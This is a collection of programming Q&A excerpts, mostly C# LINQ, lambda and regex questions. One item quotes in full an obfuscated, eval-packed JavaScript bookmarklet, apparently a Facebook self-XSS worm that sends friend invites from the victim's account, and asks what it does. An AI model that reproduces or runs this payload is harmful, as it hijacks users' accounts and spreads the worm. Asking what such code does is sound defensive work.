  • Use LINQ and lambdas to put string in proper case

    - by Tobias Funke
I have this function called ProperCase that takes a string, then converts the first letter in each word to uppercase. So ProperCase("john smith") will return "John Smith". Here is the code: public string ProperCase(string input) { var retVal = string.Empty; var words = input.Split(' '); foreach (var word in words) { if (word.Length == 1) { retVal += word.ToUpper(); } else if (word.Length > 1) { retVal += word.Substring(0, 1).ToUpper() + word.Substring(1).ToLower(); } retVal += ' '; } if (retVal.Length > 0) { retVal = retVal.Substring(0, retVal.Length - 1); } return retVal; } This code workds perfectly, but I'm pretty sure I can do it more elegantly with LINQ and lambdas. Can some please show me how?

  • other way to add item to List<>

    - by netmajor
In my other question You can see code of my arr structure and PriorityQueue collection. I normally add items to this collection like that: arr.PriorityQueue.Add(new element((value(item, endPoint) + value(startPoint, item)),item)); I am curious that is other way to do this (add element(which is struct) object to List) ? In lambda way for example ? I just eager for knowledge :)

  • Is it possible to define a generic lambda?

    - by Mike OBrien
I have some logic in a method that operates on a specified type and I'd like to create a generic lambda that encapsulates the logic. This is the spirit of what I'm trying to do: public void DoSomething() { // ... Func<T> GetTypeName = () => T.GetType().Name; GetTypeName<string>(); GetTypeName<DateTime>(); GetTypeName<int>(); // ... } I know I can pass the type as a parameter or create a generic method but I'm interested if it can just be a generic lambda (So I'm not looking for alternatives). From what I can tell C# 3.0 doesn't support this. TIA, m

  • Access the value of a member expression

    - by Schotime
If i have a product. var p = new Product { Price = 30 }; and i have the following linq query. var q = repo.Products().Where(x=>x.Price == p.Price).ToList() In an IQueryable provider, I get a MemberExpression back for the p.Price which contains a Constant Expression, however I can't seem to get the value "30" back from it. Cheers.

  • LINQ: How to Use RemoveAll without using For loop with Array

    - by CrimsonX
I currently have a log object I'd like to remove objects from, based on a LINQ query. I would like to remove all records in the log if the sum of the versions within a program are greater than 60. Currently I'm pretty confident that this'll work, but it seems kludgy: for (int index = 0; index < 4; index++) { Log.RemoveAll(log => (log.Program[index].Version[0].Value + log.Program[index].Version[1].Value + log.Program[index].Version[2].Value ) > 60); } The Program is an array of 4 values and version has an array of 3 values. Is there a more simple way to do this RemoveAll in LINQ without using the for loop? Thanks for any help in advance!

  • C# LINQ Where Predicate Type Arguments

    - by blu
I have an XElement with values for mock data. I have an expression to query the xml: Expression<Func<XElement, bool>> simpleXmlFunction = b => int.Parse(b.Element("FooId").Value) == 12; used in: var simpleXml = xml.Elements("Foo").Where(simpleXmlFunction).First(); The design time error is: The type arguments for method 'System.Linq.Enumerable.Where(System.Collections.Generic.IEnumerable, System.Func)' cannot be inferred from the usage. Try specifying the type arguments explicitly' The delegate supplied to Where should take in an XElement and return a bool, marking if the item matches the query, I am not sure how to add anything more to the delegate or the where clause to mark the type. Also, the parallel method for the real function against the Entity Framework does not have this issue. What is not correct with the LINQ-to-XML version?

  • What exactly dose this piece of JavaScript do ?

    - by helpmarnie
    ok, so I saw this page growing in popularity amoung my social circles on facebook, what 98 percent bla bla... and it walks users through copying the bellow JavaScript (i added some indentation to make it more readable) into their address bar. Looks dodgy to me, but I only have a very basic knowledge of JavaScript. simply put, What dose this do? javascript:(function(){ a='app120668947950042_jop'; b='app120668947950042_jode'; ifc='app120668947950042_ifc'; ifo='app120668947950042_ifo'; mw='app120668947950042_mwrapper'; eval(function(p,a,c,k,e,r){ e=function(c){ return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))} ; if(!''.replace(/^/,String)){ while(c--)r[e(c)]=k[c]||e(c); k=[function(e){ return r[e]} ]; e=function(){ return'\\w+'} ; c=1} ; while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]); return p} ('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"]; d=U; d[e[2]](V)[e[1]][e[0]]=e[3]; d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]]; s=d[e[2]](e[6]); m=d[e[2]](e[7]); c=d[e[9]](e[8]); c[e[11]](e[10],I,I); s[e[12]](c); C(D(){ W[e[13]]()} ,E); C(D(){ X[e[16]](e[14],e[15])} ,E); C(D(){ m[e[12]](c); d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]} ,E); ',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{ } ))} )();

  • LINQ expression precedence with Skip(), Take() and OrderBy()

    - by Robert Koritnik
    I'm using LINQ to Entities and display paged results. But I'm having issues with the combination of Skip(), Take() and OrderBy() calls. Everything works fine, except that OrderBy() is assigned too late. It's executed after result set has been cut down by Skip() and Take(). So each page of results has items in order. But ordering is done on a page handful of data instead of ordering of the whole set and then limiting those records with Skip() and Take(). How do I set precedence with these statements? My example (simplified) var query = ctx.EntitySet.Where(/* filter */).OrderBy(/* expression */); int total = query.Count(); var result = query.Skip(n).Take(x).ToList();

  • LinqToXML why does my object go out of scope? Also should I be doing a group by?

    - by Kettenbach
Hello All, I have an IEnumerable<someClass>. I need to transform it into XML. There is a property called 'ZoneId'. I need to write some XML based on this property, then I need some decendent elements that provide data relevant to the ZoneId. I know I need some type of grouping. Here's what I have attempted thus far without much success. **inventory is an IEnumerable<someClass>. So I query inventory for unique zones. This works ok. var zones = inventory.Select(c => new { ZoneID = c.ZoneId , ZoneName = c.ZoneName , Direction = c.Direction }).Distinct(); No I want to create xml based on zones and place. ***place is a property of 'someClass'. var xml = new XElement("MSG_StationInventoryList" , new XElement("StationInventory" , zones.Select(station => new XElement("station-id", station.ZoneID) , new XElement("station-name", station.ZoneName)))); This does not compile as "station" is out of scope when I try to add the "station-name" element. However is I remove the paren after 'ZoneId', station is in scope and I retreive the station-name. Only problem is the element is then a decendant of 'station-id'. This is not the desired output. They should be siblings. What am I doing wrong? Lastly after the "station-name" element, I will need another complex type which is a collection. Call it "places'. It will have child elements called "place". its data will come from the IEnumerable and I will only want "places" that have the "ZoneId" for the current zone. Can anyone point me in the right direction? Is it a mistake select distinct zones from the original IEnumerable? This object has all the data I need within it. I just need to make it heirarchical. Thanks for any pointers all. Cheers, Chris in San Diego

  • C# Joins/Where with Linq and Lambda

Hello, I'm having trouble with a query written in Linq and Lambda. So far, I'm getting allot of errors here's my code: int id = 1; var query = database.Posts.Join(database.Post_Metas, post => database.Posts.Where(x => x.ID == id), meta => database.Post_Metas.Where(x => x.Post_ID == id), (post, meta) => new { Post = post, Meta = meta }); I'm new to using Linq, so I'm not sure if this query is correct.

  • Match Regex across newlines?

    - by Jörg Battermann
I have a regex ( "(&lt;lof&lt;).*?(&gt;&gt;)" ) that works and matches perfectly on single line input. However, if the input contains newlines between the two () parts it does not match at all. What's the best way to ignore any newlines at all in that case?

  • linq expression in vb.net

Hi, Can any body translate the following c# code to vb. I have tried telarik code converter but I got problem at expression.call and it won't compile at all. private static IOrderedQueryable<T> OrderingHelper<T>(IQueryable<T> source, string propertyName, bool descending, bool anotherLevel) { ParameterExpression param = Expression.Parameter(typeof(T), string.Empty); MemberExpression property = Expression.PropertyOrField(param, propertyName); LambdaExpression sort = Expression.Lambda(property, param); MethodCallExpression call = Expression.Call( typeof(Queryable), (!anotherLevel ? "OrderBy" : "ThenBy") + (descending ? "Descending" : string.Empty), new[] { typeof(T), property.Type }, // error line source.Expression, Expression.Quote(sort)); return (IOrderedQueryable<T>)source.Provider.CreateQuery<T>(call); } thanks Thurein

  • auto indent in vim string replacement new line?

    - by rxin
I'm using the following command to auto replace some code (adding a new code segment after an existing segment) %s/my_pattern/\0, \r some_other_text_i_want_to_insert/ The problem is that with the \r, some_other_text_i_want_to_insert gets inserted right after the new line: mycode( some_random_text my_pattern ) would become mycode( some_random_text my_pattern some_other_text_i_want_to_insert <--- this line is NOT indented ) instead of mycode( some_random_text my_pattern some_other_text_i_want_to_insert <--- this line is now indented ) i.e. the new inserted line is not indented. Is there any option in vim or trick that I can make the newly inserted line indented? Thanks.

  • jQuery Ajax load images problem

    - by jackysee
I have a code that would call $.load() to get an HTML fragment. In the fragment there will be a list of images and a script that would do some calculation based on the list size. The fragment looks like <div> <ul> <li><img .../></li> <li><img .../></li> ... </ul> </div> <script> //... script to do calculation on the list width </script> Originally, I use css's max-width to ensure that the image would not exceed 180px. But as IE has no max-width, I use the expression hack. However, it seems when the image are first load, the script cannot get a correct width of image list. Seems like the script load earlier than the CSS expression. If it is a new page, I can certainly call $(window).load() to ensure all the images are loaded. But what can I do in an ajax html fragment request?

  • Dynamic expression tree how to

    - by Savvas Sopiadis
Hello everybody! Implemented a generic repository with several Methods. One of those is this: public IEnumerable<T> Find(Expression<Func<T, bool>> where) { return _objectSet.Where(where); } Given to be it is easy to call this like this: Expression<Func<Culture, bool>> whereClause = c => c.CultureId > 4 ; return cultureRepository.Find(whereClause).AsQueryable(); But now i see (realize) that this kind of quering is "limiting only to one criteria". What i would like to do is this: in the above example c is of type Culture. Culture has several properties like CultureId, Name, Displayname,... How would i express the following: CultureId 4 and Name.contains('de') and in another execution Name.contains('us') and Displayname.contains('ca') and .... Those queries should be created dynamically. I had a look in Expression trees (as i thought this to be a solution to my problem - btw i never used them before) but i cannot find anything which points to my requirement. How can this be costructed? Thanks in advance

  • Unable to validate e-mail format

Please tell me whats wrong with it?

  • How do I tell if an action is a lambda expression?

    - by Keith
I am using the EventAgregator pattern to subscribe and publish events. If a user subscribes to the event using a lambda expression, they must use a strong reference, not a weak reference, otherwise the expression can be garbage collected before the publish will execute. I wanted to add a simple check in the DelegateReference so that if a programmer passes in a lambda expression and is using a weak reference, that I throw an argument exception. This is to help "police" the code. Example: eventAggregator.GetEvent<RuleScheduler.JobExecutedEvent>().Subscribe ( e => resetEvent.Set(), ThreadOption.PublisherThread, false, // filter event, only interested in the job that this object started e => e.Value1.JobDetail.Name == jobName ); public DelegateReference(Delegate @delegate, bool keepReferenceAlive) { if (@delegate == null) throw new ArgumentNullException("delegate"); if (keepReferenceAlive) { this._delegate = @delegate; } else { //TODO: throw exception if target is a lambda expression _weakReference = new WeakReference(@delegate.Target); _method = @delegate.Method; _delegateType = @delegate.GetType(); } } any ideas? I thought I could check for @delegate.Method.IsStatic but I don't believe that works... (is every lambda expression a static?)

  • Need help with this Regex + UrlRewriter.NET please :)

    - by Pure.Krome
Previously, on StackOverflow ... (Summarized) I need to capture all requests, for a particluar subdomain .. and rewrite their destination. Now, the trick to determining the host via regex was solved. Now, i need to make sure all requests to the root index page is rewritten, but i can't figure out the correct regex to find the 'homepage' / website root. this is what i have.... <if header="HTTP_HOST" match="^foo\.mydomain\.com\.au(?::\d+)?/?$"> <!-- snip some other rewrites, eg./buying/product -> ~/Pages/Foo/Bar.aspx --> <rewrite url="^/$" to="~/Pages/SomeWeirdFolder/Home.aspx" processing="stop"/> </if> Now if one of the rewrites were not found, then it falls through and continues. So .. can anyone please help?

  • Ruby Design Problem for SQL Bulk Inserter

    - by crunchyt
This is a Ruby design problem. How can I make a reusable flat file parser that can perform different data scrubbing operations per call, return the emitted results from each scrubbing operation to the caller and perform bulk SQL insertions? Now, before anyone gets narky/concerned, I have written this code already in a very unDRY fashion. Which is why I am asking any Ruby rockstars our there for some assitance. Basically, everytime I want to perform this logic, I create two nested loops, with custom processing in between, buffer each processed line to an array, and output to the DB as a bulk insert when the buffer size limit is reached. Although I have written lots of helpers, the main pattern is being copy pasted everytime. Not very DRY! Here is a Ruby/Pseudo code example of what I am repeating. lines_from_file.each do |line| line.match(/some regex/).each do |sub_str| # Process substring into useful format # EG1: Simple gsub() call # EG2: Custom function call to do complex scrubbing # and matching, emitting results to array # EG3: Loop to match opening/closing/nested brackets # or other delimiters and emit results to array end # Add processed lines to a buffer as SQL insert statement @buffer << PREPARED INSERT STATEMENT # Flush buffer when "buffer size limit reached" or "end of file" if sql_buffer_full || last_line_reached @dbc.insert(SQL INSERTS FROM BUFFER) @buffer = nil end end I am familiar with Proc/Lambda functions. However, because I want to pass two separate procs to the one function, I am not sure how to proceed. I have some idea about how to solve this, but I would really like to see what the real Rubyists suggest? Over to you. Thanks in advance :D

  • How can i filter a list of objects using lamda expression?

    - by Colour Blend
I know i shouldn't have id's with the same value. This is just fictitious, so overlook that. I have: List<Car> carList = new List<Car>(); carList.Add(new Car() { id = 1, name = "Honda" }); carList.Add(new Car() { id = 2, name = "Toyota" }); carList.Add(new Car() { id = 1, name = "Nissan" }); I want to use Lamda Expression to retreive all cars that have an id of 1. Anticipated Result: -- Id: 1, Name: Honda -- Id: 1, Name: Nissan The problem is more filtering an object list based on a foriegn key. Please help me.

  • Getting specific values with regex [JAVA, ANDROID]

    - by David
I need to knowingly isolate each row of the vcard and get its value. For instance, I want to get "5555" from X-CUSTOMFIELD. So far, my thoughts are: "X-CUSTOMFIELD;\d+" I have been looking at some tutorials and I am a little confused with what function to use? What would my regex above return? Would it give me the whole line or just the numerical part (5555)? I was thinking I i get the whole row, I can use substring to get the digits? BEGIN:VCARD VERSION:2.1 N:Last;First; FN:First Last TEL;HOME;VOICE:111111 TEL;MOBILE;VOICE:222222 X-CUSTOMFIELD;5555 END:VCARD

  • Can somone help fix up my simple regex query, please?

    - by Pure.Krome
Hi folks, yep - another noob regex query, which I can't seem to get. I'm trying to get all matches for the string foo.mydomain.com/ or foo.mydomain.com:1234/ or foo.mydomain.com:<random port>/ but any other paths do not match, ie. foo.mydomain.com/bar or foo.mydomain.com/bar/pewpew I tried to use: foo.mydomain.com(.*)/$ ( starts with anything, then foo.mydomain.com, then any thing after that .. until a slash. then end. (this search query is anchored to the end of the line). but that doesn't work. It doesn't match when i pass in foo.mydomain.com:1234 but it correct says foo.mydomain.com/bar/pewpew is not a match (as expected). any ideas?
